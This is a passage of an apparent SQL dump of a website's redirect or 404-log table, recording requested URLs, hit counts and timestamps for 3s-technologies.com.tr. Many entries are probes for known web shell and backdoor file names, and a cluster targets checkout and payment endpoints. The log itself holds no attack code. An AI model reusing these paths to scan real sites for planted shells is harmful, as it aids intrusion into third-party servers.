00:00:00',301),(59978,'http://3s-technologies.com.tr/tr/schal.php',NULL,'','',2,0,'2026-03-28 15:59:07','0000-00-00 00:00:00',301),(59979,'http://3s-technologies.com.tr/tr/wp-admin/maint/wta.php',NULL,'','',3,0,'2026-03-28 15:59:08','0000-00-00 00:00:00',301),(59980,'http://3s-technologies.com.tr/tr/wp-admin/maint/dtyh.php',NULL,'','',2,0,'2026-03-28 15:59:09','0000-00-00 00:00:00',301),(59981,'http://3s-technologies.com.tr/tr/dtyh.php',NULL,'','',2,0,'2026-03-28 15:59:10','0000-00-00 00:00:00',301),(59982,'http://3s-technologies.com.tr/tr/gpt-sh.php',NULL,'','',17,0,'2026-03-28 15:59:16','0000-00-00 00:00:00',301),(59983,'http://3s-technologies.com.tr/tr/wp-true.php',NULL,'','',3,0,'2026-03-28 15:59:17','0000-00-00 00:00:00',301),(59984,'http://3s-technologies.com.tr/tr/tx88.php',NULL,'','',2,0,'2026-03-28 15:59:19','0000-00-00 00:00:00',301),(59985,'http://3s-technologies.com.tr/tr/uang.php',NULL,'','',3,0,'2026-03-28 15:59:23','0000-00-00 00:00:00',301),(59986,'http://3s-technologies.com.tr/tr/wp3.php',NULL,'','',5,0,'2026-03-28 15:59:24','0000-00-00 00:00:00',301),(59987,'http://3s-technologies.com.tr/tr/wp-admin/maint/absorption.php',NULL,'','',2,0,'2026-03-28 15:59:26','0000-00-00 00:00:00',301),(59988,'http://3s-technologies.com.tr/tr/wglum1.php',NULL,'','',15,0,'2026-03-28 15:59:27','0000-00-00 00:00:00',301),(59989,'http://3s-technologies.com.tr/tr/yuzuru1.php',NULL,'','',23,0,'2026-03-28 15:59:29','0000-00-00 00:00:00',301),(59990,'http://3s-technologies.com.tr/tr/wdone1.php',NULL,'','',7,0,'2026-03-28 15:59:30','0000-00-00 00:00:00',301),(59991,'https://3s-technologies.com.tr/tr/api/checkout/pub/orderform',NULL,'','',7,0,'2026-03-28 20:50:02','0000-00-00 00:00:00',301),(59992,'https://3s-technologies.com.tr/tr/pagamento',NULL,'','',7,0,'2026-03-28 20:50:02','0000-00-00 00:00:00',301),(59993,'https://3s-technologies.com.tr/tr/checkout/onepage',NULL,'','',7,0,'2026-03-28 20:50:02','0000-00-00 00:00:00',301),(59994,'https://3s-technologies.com.tr/tr/carrinho',NULL,'','',7,0,'2026-03-28 20:50:02','0000-00-00 00:00:00',301),(59995,'https://3s-technologies.com.tr/tr/wc-api/v3',NULL,'','',2,0,'2026-03-28 20:50:03','0000-00-00 00:00:00',301),(59996,'https://3s-technologies.com.tr/tr/checkout/v2/payment',NULL,'','',4,0,'2026-03-28 20:50:03','0000-00-00 00:00:00',301),(59997,'https://3s-technologies.com.tr/tr/services/shop-id',NULL,'','',7,0,'2026-03-28 20:50:03','0000-00-00 00:00:00',301),(59998,'https://3s-technologies.com.tr/tr/compra-click',NULL,'','',7,0,'2026-03-28 20:50:03','0000-00-00 00:00:00',301),(59999,'https://3s-technologies.com.tr/tr/checkout',NULL,'','',7,0,'2026-03-28 20:50:03','0000-00-00 00:00:00',301),(60000,'https://3s-technologies.com.tr/tr/pago/finalizar',NULL,'','',7,0,'2026-03-28 20:50:03','0000-00-00 00:00:00',301),(60001,'http://mail.3s-technologies.com.tr/tr/explorer/index_.php',NULL,'','',3,0,'2026-03-29 11:02:49','0000-00-00 00:00:00',301),(60002,'http://mail.3s-technologies.com.tr/tr/class-wp-l10n-cache.php',NULL,'','',1,0,'2026-03-29 11:03:09','0000-00-00 00:00:00',301),(60003,'http://mail.3s-technologies.com.tr/tr/unloathness.php',NULL,'','',2,0,'2026-03-29 11:03:13','0000-00-00 00:00:00',301),(60004,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade/wp-login.php',NULL,'','',1,0,'2026-03-29 11:03:20','0000-00-00 00:00:00',301),(60005,'http://mail.3s-technologies.com.tr/tr/0xd.php',NULL,'','',1,0,'2026-03-29 11:03:23','0000-00-00 00:00:00',301),(60006,'http://3s-technologies.com.tr/tr/explorer/index_.php',NULL,'','',6,0,'2026-03-29 12:17:22','0000-00-00 00:00:00',301),(60007,'http://3s-technologies.com.tr/tr/wxfyf.php',NULL,'','',7,0,'2026-03-30 13:53:38','0000-00-00 00:00:00',301),(60008,'http://3s-technologies.com.tr/tr/lowpr.php',NULL,'','',7,0,'2026-03-30 13:54:07','0000-00-00 00:00:00',301),(60009,'http://3s-technologies.com.tr/tr/ws87.php',NULL,'','',12,0,'2026-03-30 13:54:23','0000-00-00 00:00:00',301),(60010,'http://3s-technologies.com.tr/tr/ahutr.php',NULL,'','',6,0,'2026-03-30 18:46:24','0000-00-00 00:00:00',301),(60011,'http://3s-technologies.com.tr/tr/byrgo.php',NULL,'','',40,0,'2026-03-30 18:46:25','0000-00-00 00:00:00',301),(60012,'http://3s-technologies.com.tr/tr/wp-asudo.php',NULL,'','',4,0,'2026-03-30 18:46:28','0000-00-00 00:00:00',301),(60013,'http://3s-technologies.com.tr/tr/wp-temp.php',NULL,'','',18,0,'2026-03-30 18:46:28','0000-00-00 00:00:00',301),(60014,'http://3s-technologies.com.tr/tr/wp-moonka.php',NULL,'','',8,0,'2026-03-30 18:46:29','0000-00-00 00:00:00',301),(60015,'http://3s-technologies.com.tr/tr/cdx2.php',NULL,'','',30,0,'2026-03-30 18:46:29','0000-00-00 00:00:00',301),(60016,'http://3s-technologies.com.tr/tr/cdx1.php',NULL,'','',35,0,'2026-03-30 18:46:30','0000-00-00 00:00:00',301),(60017,'http://3s-technologies.com.tr/tr/zlnckdxn.php',NULL,'','',5,0,'2026-03-30 18:46:31','0000-00-00 00:00:00',301),(60018,'http://3s-technologies.com.tr/tr/wp-thi.php',NULL,'','',7,0,'2026-03-30 18:46:31','0000-00-00 00:00:00',301),(60019,'http://3s-technologies.com.tr/tr/press.php',NULL,'','',27,0,'2026-03-30 18:46:31','0000-00-00 00:00:00',301),(60020,'http://3s-technologies.com.tr/tr/vvedr.php',NULL,'','',3,0,'2026-03-30 18:46:35','0000-00-00 00:00:00',301),(60021,'http://3s-technologies.com.tr/tr/htto.php',NULL,'','',9,0,'2026-03-30 18:46:37','0000-00-00 00:00:00',301),(60022,'http://3s-technologies.com.tr/tr/xhejulap.php',NULL,'','',3,0,'2026-03-30 18:46:38','0000-00-00 00:00:00',301),(60023,'http://3s-technologies.com.tr/tr/ddpxi.php',NULL,'','',3,0,'2026-03-30 18:46:40','0000-00-00 00:00:00',301),(60024,'http://3s-technologies.com.tr/tr/cdkfu.php',NULL,'','',3,0,'2026-03-30 18:46:40','0000-00-00 00:00:00',301),(60025,'http://3s-technologies.com.tr/tr/icc7p.php',NULL,'','',3,0,'2026-03-30 18:46:40','0000-00-00 00:00:00',301),(60026,'http://mail.3s-technologies.com.tr/tr/upload/k2l66g.php',NULL,'','',3,0,'2026-03-30 22:15:04','0000-00-00 00:00:00',301),(60027,'http://mail.3s-technologies.com.tr/tr/nz.php',NULL,'','',9,0,'2026-03-30 22:15:10','0000-00-00 00:00:00',301),(60028,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/alfa-rex.php',NULL,'','',3,0,'2026-03-30 22:16:07','0000-00-00 00:00:00',301),(60029,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/link.php',NULL,'','',9,0,'2026-03-30 22:16:08','0000-00-00 00:00:00',301),(60030,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/plugins.php',NULL,'','',9,0,'2026-03-30 22:16:09','0000-00-00 00:00:00',301),(60031,'http://mail.3s-technologies.com.tr/tr/wp-includes/rest-api/alfa-rex.php',NULL,'','',9,0,'2026-03-30 22:16:10','0000-00-00 00:00:00',301),(60032,'http://mail.3s-technologies.com.tr/tr/wp-includes/html-api/wp-login.php',NULL,'','',9,0,'2026-03-30 22:16:11','0000-00-00 00:00:00',301),(60033,'http://mail.3s-technologies.com.tr/tr/assets/edit.php',NULL,'','',20,0,'2026-03-30 22:16:12','0000-00-00 00:00:00',301),(60034,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/crystal/about.php',NULL,'','',9,0,'2026-03-30 22:16:12','0000-00-00 00:00:00',301),(60035,'http://mail.3s-technologies.com.tr/tr/wp-content/file.php',NULL,'','',9,0,'2026-03-30 22:16:13','0000-00-00 00:00:00',301),(60036,'http://mail.3s-technologies.com.tr/tr/.well-known/pkivalidation/log.php',NULL,'','',9,0,'2026-03-30 22:16:14','0000-00-00 00:00:00',301),(60037,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/about.php',NULL,'','',15,0,'2026-03-30 22:16:14','0000-00-00 00:00:00',301),(60038,'http://mail.3s-technologies.com.tr/tr/wp-admin/packed.php',NULL,'','',9,0,'2026-03-30 22:16:15','0000-00-00 00:00:00',301),(60039,'http://mail.3s-technologies.com.tr/tr/wp-includes/style-engine/wp-login.php',NULL,'','',9,0,'2026-03-30 22:16:18','0000-00-00 00:00:00',301),(60040,'http://3s-technologies.com.tr/tr/fm.php.gif',NULL,'','',1,0,'2026-03-30 22:50:52','0000-00-00 00:00:00',301),(60041,'http://3s-technologies.com.tr/tr/5127b574-17a6-4d72-a759-92349f5d56f2.php',NULL,'','',1,0,'2026-03-30 22:50:54','0000-00-00 00:00:00',301),(60042,'http://3s-technologies.com.tr/tr/vip.php',NULL,'','',1,0,'2026-03-30 22:50:56','0000-00-00 00:00:00',301),(60043,'http://3s-technologies.com.tr/tr/upload/k2l66g.php',NULL,'','',7,0,'2026-03-31 02:14:34','0000-00-00 00:00:00',301),(60044,'http://3s-technologies.com.tr/tr/20025tn.php?p=',NULL,'','',2,0,'2026-03-31 11:19:02','0000-00-00 00:00:00',301),(60045,'http://3s-technologies.com.tr/tr/wp-cer.php',NULL,'','',2,0,'2026-03-31 11:19:02','0000-00-00 00:00:00',301),(60046,'http://3s-technologies.com.tr/tr/welcom.php',NULL,'','',2,0,'2026-03-31 11:19:03','0000-00-00 00:00:00',301),(60047,'http://3s-technologies.com.tr/tr/.mopj.php',NULL,'','',10,0,'2026-03-31 11:19:05','0000-00-00 00:00:00',301),(60048,'http://3s-technologies.com.tr/tr/xozx.php',NULL,'','',17,0,'2026-03-31 11:19:05','0000-00-00 00:00:00',301),(60049,'http://3s-technologies.com.tr/tr/1111.php?p=',NULL,'','',3,0,'2026-03-31 11:19:06','0000-00-00 00:00:00',301),(60050,'http://3s-technologies.com.tr/tr/xendppio.php',NULL,'','',2,0,'2026-03-31 11:19:06','0000-00-00 00:00:00',301),(60051,'http://3s-technologies.com.tr/tr/ycadmin.php',NULL,'','',2,0,'2026-03-31 11:19:07','0000-00-00 00:00:00',301),(60052,'http://3s-technologies.com.tr/tr/lti.php',NULL,'','',3,0,'2026-03-31 11:19:08','0000-00-00 00:00:00',301),(60053,'http://3s-technologies.com.tr/tr/aligk.php',NULL,'','',36,0,'2026-03-31 11:19:09','0000-00-00 00:00:00',301),(60054,'http://3s-technologies.com.tr/tr/cnusw.php',NULL,'','',2,0,'2026-03-31 11:19:10','0000-00-00 00:00:00',301),(60055,'http://3s-technologies.com.tr/tr/logain5.php',NULL,'','',1,0,'2026-03-31 11:19:21','0000-00-00 00:00:00',301),(60056,'http://3s-technologies.com.tr/tr/o00.php',NULL,'','',1,0,'2026-03-31 11:19:40','0000-00-00 00:00:00',301),(60057,'http://mail.3s-technologies.com.tr/tr/wp-admin/post.php',NULL,'','',4,0,'2026-03-31 18:07:26','0000-00-00 00:00:00',301),(60058,'http://mail.3s-technologies.com.tr/tr/wp-admin/post-new.php',NULL,'','',1,0,'2026-03-31 18:07:28','0000-00-00 00:00:00',301),(60059,'http://mail.3s-technologies.com.tr/tr/lib/functions.php',NULL,'','',1,0,'2026-03-31 18:07:29','0000-00-00 00:00:00',301),(60060,'http://mail.3s-technologies.com.tr/tr/w/vendor/autoload.php',NULL,'','',1,0,'2026-03-31 18:07:30','0000-00-00 00:00:00',301),(60061,'http://mail.3s-technologies.com.tr/tr/w/setup.php',NULL,'','',1,0,'2026-03-31 18:07:31','0000-00-00 00:00:00',301),(60062,'http://mail.3s-technologies.com.tr/tr/w/contact.php',NULL,'','',1,0,'2026-03-31 18:07:31','0000-00-00 00:00:00',301),(60063,'http://mail.3s-technologies.com.tr/tr/w/kill.php',NULL,'','',1,0,'2026-03-31 18:07:32','0000-00-00 00:00:00',301),(60064,'http://mail.3s-technologies.com.tr/tr/w/app/tools/functions.php',NULL,'','',1,0,'2026-03-31 18:07:32','0000-00-00 00:00:00',301),(60065,'http://mail.3s-technologies.com.tr/tr/w/app/database/basic.php',NULL,'','',1,0,'2026-03-31 18:07:33','0000-00-00 00:00:00',301),(60066,'http://mail.3s-technologies.com.tr/tr/w/template/views/.php',NULL,'','',1,0,'2026-03-31 18:07:34','0000-00-00 00:00:00',301),(60067,'http://mail.3s-technologies.com.tr/tr/profile.php',NULL,'','',9,0,'2026-03-31 18:07:36','0000-00-00 00:00:00',301),(60068,'http://mail.3s-technologies.com.tr/tr/wer.php',NULL,'','',1,0,'2026-03-31 18:07:37','0000-00-00 00:00:00',301),(60069,'http://mail.3s-technologies.com.tr/tr/crouter.php',NULL,'','',1,0,'2026-03-31 18:07:37','0000-00-00 00:00:00',301),(60070,'http://mail.3s-technologies.com.tr/tr/copyright.php',NULL,'','',1,0,'2026-03-31 18:07:38','0000-00-00 00:00:00',301),(60071,'http://mail.3s-technologies.com.tr/en/uctshcum.php',NULL,'','',1,0,'2026-03-31 18:07:51','0000-00-00 00:00:00',301),(60072,'http://mail.3s-technologies.com.tr/en/old/wp-admin/setup-config.php',NULL,'','',1,0,'2026-03-31 18:07:52','0000-00-00 00:00:00',301),(60073,'http://mail.3s-technologies.com.tr/en/expect.php',NULL,'','',1,0,'2026-03-31 18:07:52','0000-00-00 00:00:00',301),(60074,'http://mail.3s-technologies.com.tr/en/wp-content/uploads/json.php',NULL,'','',1,0,'2026-03-31 18:07:53','0000-00-00 00:00:00',301),(60075,'http://mail.3s-technologies.com.tr/en/admin/uploads/lv.php',NULL,'','',1,0,'2026-03-31 18:07:54','0000-00-00 00:00:00',301),(60076,'http://mail.3s-technologies.com.tr/en/wp-admin/js/about.php',NULL,'','',1,0,'2026-03-31 18:07:55','0000-00-00 00:00:00',301),(60077,'http://mail.3s-technologies.com.tr/en/admin/uploads/media.php',NULL,'','',1,0,'2026-03-31 18:07:55','0000-00-00 00:00:00',301),(60078,'http://mail.3s-technologies.com.tr/en/wp-admin/images/index.php',NULL,'','',1,0,'2026-03-31 18:07:56','0000-00-00 00:00:00',301),(60079,'http://mail.3s-technologies.com.tr/en/wp-admin/css/colors/coffee/about.php',NULL,'','',1,0,'2026-03-31 18:07:57','0000-00-00 00:00:00',301),(60080,'http://mail.3s-technologies.com.tr/en/browse.php',NULL,'','',1,0,'2026-03-31 18:07:58','0000-00-00 00:00:00',301),(60081,'http://mail.3s-technologies.com.tr/en/index/lock.php',NULL,'','',1,0,'2026-03-31 18:07:58','0000-00-00 00:00:00',301),(60082,'http://mail.3s-technologies.com.tr/en/wp-content/config.php',NULL,'','',1,0,'2026-03-31 18:07:59','0000-00-00 00:00:00',301),(60083,'http://mail.3s-technologies.com.tr/en/moon.php',NULL,'','',1,0,'2026-03-31 18:08:00','0000-00-00 00:00:00',301),(60084,'http://mail.3s-technologies.com.tr/en/wp-includes/id3/index.php',NULL,'','',1,0,'2026-03-31 18:08:01','0000-00-00 00:00:00',301),(60085,'http://mail.3s-technologies.com.tr/en/wp-admin/css/wp-conflg.php',NULL,'','',1,0,'2026-03-31 18:08:01','0000-00-00 00:00:00',301),(60086,'http://mail.3s-technologies.com.tr/en/wp-admin/css/colors/index.php',NULL,'','',1,0,'2026-03-31 18:08:02','0000-00-00 00:00:00',301),(60087,'http://mail.3s-technologies.com.tr/en/css/chosen.php',NULL,'','',1,0,'2026-03-31 18:08:02','0000-00-00 00:00:00',301),(60088,'http://mail.3s-technologies.com.tr/en/wp-includes/text/index.php',NULL,'','',1,0,'2026-03-31 18:08:03','0000-00-00 00:00:00',301),(60089,'http://mail.3s-technologies.com.tr/en/packed.php',NULL,'','',1,0,'2026-03-31 18:08:04','0000-00-00 00:00:00',301),(60090,'http://mail.3s-technologies.com.tr/en/wp-admin/update.php',NULL,'','',1,0,'2026-03-31 18:08:05','0000-00-00 00:00:00',301),(60091,'http://mail.3s-technologies.com.tr/en/link.php',NULL,'','',1,0,'2026-03-31 18:08:05','0000-00-00 00:00:00',301),(60092,'http://mail.3s-technologies.com.tr/en/footer.php',NULL,'','',1,0,'2026-03-31 18:08:06','0000-00-00 00:00:00',301),(60093,'http://mail.3s-technologies.com.tr/en/fw.php',NULL,'','',1,0,'2026-03-31 18:08:07','0000-00-00 00:00:00',301),(60094,'http://mail.3s-technologies.com.tr/en/post.php',NULL,'','',1,0,'2026-03-31 18:08:08','0000-00-00 00:00:00',301),(60095,'http://mail.3s-technologies.com.tr/en/alfa_data/index.php',NULL,'','',1,0,'2026-03-31 18:08:09','0000-00-00 00:00:00',301),(60096,'http://mail.3s-technologies.com.tr/en/wp-admin/css/colors/blue/moon.php',NULL,'','',1,0,'2026-03-31 18:08:10','0000-00-00 00:00:00',301),(60097,'http://mail.3s-technologies.com.tr/en/wp-admin/includes/m.php',NULL,'','',1,0,'2026-03-31 18:08:11','0000-00-00 00:00:00',301),(60098,'http://mail.3s-technologies.com.tr/en/images/admin.php',NULL,'','',1,0,'2026-03-31 18:08:11','0000-00-00 00:00:00',301),(60099,'http://mail.3s-technologies.com.tr/en/wp-admin/user/admin.php',NULL,'','',1,0,'2026-03-31 18:08:12','0000-00-00 00:00:00',301),(60100,'http://mail.3s-technologies.com.tr/en/wp-includes/ixr/shell.php',NULL,'','',1,0,'2026-03-31 18:08:13','0000-00-00 00:00:00',301),(60101,'http://mail.3s-technologies.com.tr/en/wp-trackback.php',NULL,'','',1,0,'2026-03-31 18:08:13','0000-00-00 00:00:00',301),(60102,'http://mail.3s-technologies.com.tr/en/admin/upload/themes-install.php',NULL,'','',1,0,'2026-03-31 18:08:14','0000-00-00 00:00:00',301),(60103,'http://mail.3s-technologies.com.tr/en/0x.php',NULL,'','',1,0,'2026-03-31 18:08:15','0000-00-00 00:00:00',301),(60104,'http://mail.3s-technologies.com.tr/en/wp-admin/js/alfa-rex.php',NULL,'','',1,0,'2026-03-31 18:08:16','0000-00-00 00:00:00',301),(60105,'http://mail.3s-technologies.com.tr/en/include/mail.php',NULL,'','',1,0,'2026-03-31 18:08:16','0000-00-00 00:00:00',301),(60106,'http://mail.3s-technologies.com.tr/en/.well-known/admin.php',NULL,'','',1,0,'2026-03-31 18:08:17','0000-00-00 00:00:00',301),(60107,'http://mail.3s-technologies.com.tr/en/bs1.php',NULL,'','',1,0,'2026-03-31 18:08:18','0000-00-00 00:00:00',301),(60108,'http://mail.3s-technologies.com.tr/en/wp-admin/images/about.php',NULL,'','',1,0,'2026-03-31 18:08:19','0000-00-00 00:00:00',301),(60109,'http://mail.3s-technologies.com.tr/en/wp-admin/log.php',NULL,'','',1,0,'2026-03-31 18:08:19','0000-00-00 00:00:00',301),(60110,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/xmrlpc.php',NULL,'','',1,0,'2026-03-31 18:08:20','0000-00-00 00:00:00',301),(60111,'http://mail.3s-technologies.com.tr/en/uploads/test.php',NULL,'','',1,0,'2026-03-31 18:08:21','0000-00-00 00:00:00',301),(60112,'http://mail.3s-technologies.com.tr/en/wp-admin/upgrade.php',NULL,'','',1,0,'2026-03-31 18:08:22','0000-00-00 00:00:00',301),(60113,'http://mail.3s-technologies.com.tr/en/max.php',NULL,'','',1,0,'2026-03-31 18:08:22','0000-00-00 00:00:00',301),(60114,'http://mail.3s-technologies.com.tr/en/plugins/phpthumb/404.php',NULL,'','',1,0,'2026-03-31 18:08:23','0000-00-00 00:00:00',301),(60115,'http://mail.3s-technologies.com.tr/en/wp-admin/media.php',NULL,'','',1,0,'2026-03-31 18:08:24','0000-00-00 00:00:00',301),(60116,'http://mail.3s-technologies.com.tr/en/install.php',NULL,'','',1,0,'2026-03-31 18:08:25','0000-00-00 00:00:00',301),(60117,'http://mail.3s-technologies.com.tr/en/include/wp-configs.php',NULL,'','',1,0,'2026-03-31 18:08:26','0000-00-00 00:00:00',301),(60118,'http://mail.3s-technologies.com.tr/en/wp-admin/js/chosen.php',NULL,'','',1,0,'2026-03-31 18:08:27','0000-00-00 00:00:00',301),(60119,'http://mail.3s-technologies.com.tr/en/wp-admin/maint/about.php',NULL,'','',1,0,'2026-03-31 18:08:28','0000-00-00 00:00:00',301),(60120,'http://mail.3s-technologies.com.tr/en/bg/xmrlpc.php',NULL,'','',1,0,'2026-03-31 18:08:28','0000-00-00 00:00:00',301),(60121,'http://mail.3s-technologies.com.tr/en/wp-admin/network/wp-conflg.php',NULL,'','',1,0,'2026-03-31 18:08:29','0000-00-00 00:00:00',301),(60122,'http://mail.3s-technologies.com.tr/en/wp-admin/css/colors/blue/atomlib.php',NULL,'','',1,0,'2026-03-31 18:08:30','0000-00-00 00:00:00',301),(60123,'http://mail.3s-technologies.com.tr/en/wp-admin/byp.php',NULL,'','',1,0,'2026-03-31 18:08:31','0000-00-00 00:00:00',301),(60124,'http://mail.3s-technologies.com.tr/en/wp-includes/theme-compat/index.php',NULL,'','',1,0,'2026-03-31 18:08:31','0000-00-00 00:00:00',301),(60125,'http://mail.3s-technologies.com.tr/en/wp-content/wp-login.php',NULL,'','',1,0,'2026-03-31 18:08:32','0000-00-00 00:00:00',301),(60126,'http://mail.3s-technologies.com.tr/en/admin/editor/engine.php',NULL,'','',1,0,'2026-03-31 18:08:33','0000-00-00 00:00:00',301),(60127,'http://mail.3s-technologies.com.tr/en/chosen.php',NULL,'','',1,0,'2026-03-31 18:08:34','0000-00-00 00:00:00',301),(60128,'http://mail.3s-technologies.com.tr/en/wp-content/themes/aahana/json.php',NULL,'','',1,0,'2026-03-31 18:08:34','0000-00-00 00:00:00',301),(60129,'http://mail.3s-technologies.com.tr/en/wp-includes/html-api/about.php',NULL,'','',1,0,'2026-03-31 18:08:35','0000-00-00 00:00:00',301),(60130,'http://mail.3s-technologies.com.tr/en/images/lmfi2.php',NULL,'','',1,0,'2026-03-31 18:08:36','0000-00-00 00:00:00',301),(60131,'http://mail.3s-technologies.com.tr/en/wp-admin/function.php',NULL,'','',1,0,'2026-03-31 18:08:36','0000-00-00 00:00:00',301),(60132,'http://mail.3s-technologies.com.tr/en/wp-includes/text/diff/alfa-rex.php',NULL,'','',1,0,'2026-03-31 18:08:37','0000-00-00 00:00:00',301),(60133,'http://mail.3s-technologies.com.tr/en/images/chosen.php',NULL,'','',1,0,'2026-03-31 18:08:38','0000-00-00 00:00:00',301),(60134,'http://mail.3s-technologies.com.tr/en/mah.php',NULL,'','',1,0,'2026-03-31 18:08:39','0000-00-00 00:00:00',301),(60135,'http://3s-technologies.com.tr/tr/wp-admin/post-new.php',NULL,'','',2,0,'2026-03-31 19:34:33','0000-00-00 00:00:00',301),(60136,'http://3s-technologies.com.tr/tr/lib/functions.php',NULL,'','',2,0,'2026-03-31 19:34:34','0000-00-00 00:00:00',301),(60137,'http://3s-technologies.com.tr/tr/w/vendor/autoload.php',NULL,'','',2,0,'2026-03-31 19:34:35','0000-00-00 00:00:00',301),(60138,'http://3s-technologies.com.tr/tr/w/setup.php',NULL,'','',2,0,'2026-03-31 19:34:36','0000-00-00 00:00:00',301),(60139,'http://3s-technologies.com.tr/tr/w/contact.php',NULL,'','',2,0,'2026-03-31 19:34:37','0000-00-00 00:00:00',301),(60140,'http://3s-technologies.com.tr/tr/w/kill.php',NULL,'','',2,0,'2026-03-31 19:34:37','0000-00-00 00:00:00',301),(60141,'http://3s-technologies.com.tr/tr/w/app/tools/functions.php',NULL,'','',2,0,'2026-03-31 19:34:38','0000-00-00 00:00:00',301),(60142,'http://3s-technologies.com.tr/tr/w/app/database/basic.php',NULL,'','',2,0,'2026-03-31 19:34:39','0000-00-00 00:00:00',301),(60143,'http://3s-technologies.com.tr/tr/w/template/views/.php',NULL,'','',2,0,'2026-03-31 19:34:40','0000-00-00 00:00:00',301),(60144,'http://3s-technologies.com.tr/tr/wer.php',NULL,'','',2,0,'2026-03-31 19:34:43','0000-00-00 00:00:00',301),(60145,'http://3s-technologies.com.tr/tr/crouter.php',NULL,'','',2,0,'2026-03-31 19:34:43','0000-00-00 00:00:00',301),(60146,'http://3s-technologies.com.tr/tr/copyright.php',NULL,'','',2,0,'2026-03-31 19:34:44','0000-00-00 00:00:00',301),(60147,'http://3s-technologies.com.tr/tr/assets/images/hehe.php',NULL,'','',2,0,'2026-03-31 19:34:45','0000-00-00 00:00:00',301),(60148,'http://3s-technologies.com.tr/tr/wp-conter.php',NULL,'','',2,0,'2026-03-31 19:34:46','0000-00-00 00:00:00',301),(60149,'http://3s-technologies.com.tr/tr/ua/index_old.php',NULL,'','',2,0,'2026-03-31 19:34:46','0000-00-00 00:00:00',301),(60150,'http://3s-technologies.com.tr/tr/wp-admin/js/upgrade.php',NULL,'','',2,0,'2026-03-31 19:34:47','0000-00-00 00:00:00',301),(60151,'http://3s-technologies.com.tr/tr/wp-adminmaintmailer.php',NULL,'','',2,0,'2026-03-31 19:34:47','0000-00-00 00:00:00',301),(60152,'http://3s-technologies.com.tr/en/ru/adminer-4.2.4.php',NULL,'','',2,0,'2026-03-31 19:34:48','0000-00-00 00:00:00',301),(60153,'http://3s-technologies.com.tr/en/rasp.php',NULL,'','',2,0,'2026-03-31 19:34:50','0000-00-00 00:00:00',301),(60154,'http://3s-technologies.com.tr/en/sk-park.php',NULL,'','',2,0,'2026-03-31 19:34:51','0000-00-00 00:00:00',301),(60155,'http://3s-technologies.com.tr/en/uctshcum.php',NULL,'','',2,0,'2026-03-31 19:34:56','0000-00-00 00:00:00',301),(60156,'http://3s-technologies.com.tr/en/old/wp-admin/setup-config.php',NULL,'','',2,0,'2026-03-31 19:34:56','0000-00-00 00:00:00',301),(60157,'http://3s-technologies.com.tr/en/expect.php',NULL,'','',2,0,'2026-03-31 19:34:57','0000-00-00 00:00:00',301),(60158,'http://3s-technologies.com.tr/en/admin/uploads/lv.php',NULL,'','',2,0,'2026-03-31 19:34:59','0000-00-00 00:00:00',301),(60159,'http://3s-technologies.com.tr/en/admin/uploads/media.php',NULL,'','',2,0,'2026-03-31 19:35:00','0000-00-00 00:00:00',301),(60160,'http://3s-technologies.com.tr/en/index/lock.php',NULL,'','',2,0,'2026-03-31 19:35:03','0000-00-00 00:00:00',301),(60161,'http://3s-technologies.com.tr/en/wp-content/config.php',NULL,'','',2,0,'2026-03-31 19:35:03','0000-00-00 00:00:00',301),(60162,'http://3s-technologies.com.tr/en/wp-admin/css/wp-conflg.php',NULL,'','',2,0,'2026-03-31 19:35:05','0000-00-00 00:00:00',301),(60163,'http://3s-technologies.com.tr/en/wp-admin/update.php',NULL,'','',2,0,'2026-03-31 19:35:08','0000-00-00 00:00:00',301),(60164,'http://3s-technologies.com.tr/en/alfa_data/index.php',NULL,'','',2,0,'2026-03-31 19:35:12','0000-00-00 00:00:00',301),(60165,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/moon.php',NULL,'','',2,0,'2026-03-31 19:35:13','0000-00-00 00:00:00',301),(60166,'http://3s-technologies.com.tr/en/wp-admin/includes/m.php',NULL,'','',2,0,'2026-03-31 19:35:14','0000-00-00 00:00:00',301),(60167,'http://3s-technologies.com.tr/en/wp-admin/user/admin.php',NULL,'','',2,0,'2026-03-31 19:35:15','0000-00-00 00:00:00',301),(60168,'http://3s-technologies.com.tr/en/wp-includes/ixr/shell.php',NULL,'','',2,0,'2026-03-31 19:35:16','0000-00-00 00:00:00',301),(60169,'http://3s-technologies.com.tr/en/admin/upload/themes-install.php',NULL,'','',2,0,'2026-03-31 19:35:17','0000-00-00 00:00:00',301),(60170,'http://3s-technologies.com.tr/en/wp-admin/js/alfa-rex.php',NULL,'','',2,0,'2026-03-31 19:35:18','0000-00-00 00:00:00',301),(60171,'http://3s-technologies.com.tr/en/include/mail.php',NULL,'','',2,0,'2026-03-31 19:35:19','0000-00-00 00:00:00',301),(60172,'http://3s-technologies.com.tr/en/bs1.php',NULL,'','',2,0,'2026-03-31 19:35:21','0000-00-00 00:00:00',301),(60173,'http://3s-technologies.com.tr/en/wp-admin/log.php',NULL,'','',2,0,'2026-03-31 19:35:22','0000-00-00 00:00:00',301),(60174,'http://3s-technologies.com.tr/en/wp-content/plugins/xmrlpc.php',NULL,'','',2,0,'2026-03-31 19:35:23','0000-00-00 00:00:00',301),(60175,'http://3s-technologies.com.tr/en/uploads/test.php',NULL,'','',2,0,'2026-03-31 19:35:24','0000-00-00 00:00:00',301),(60176,'http://3s-technologies.com.tr/en/wp-admin/upgrade.php',NULL,'','',2,0,'2026-03-31 19:35:24','0000-00-00 00:00:00',301),(60177,'http://3s-technologies.com.tr/en/max.php',NULL,'','',2,0,'2026-03-31 19:35:25','0000-00-00 00:00:00',301),(60178,'http://3s-technologies.com.tr/en/plugins/phpthumb/404.php',NULL,'','',2,0,'2026-03-31 19:35:26','0000-00-00 00:00:00',301),(60179,'http://3s-technologies.com.tr/en/wp-admin/media.php',NULL,'','',2,0,'2026-03-31 19:35:27','0000-00-00 00:00:00',301),(60180,'http://3s-technologies.com.tr/en/include/wp-configs.php',NULL,'','',2,0,'2026-03-31 19:35:29','0000-00-00 00:00:00',301),(60181,'http://3s-technologies.com.tr/en/bg/xmrlpc.php',NULL,'','',2,0,'2026-03-31 19:35:31','0000-00-00 00:00:00',301),(60182,'http://3s-technologies.com.tr/en/wp-admin/network/wp-conflg.php',NULL,'','',2,0,'2026-03-31 19:35:31','0000-00-00 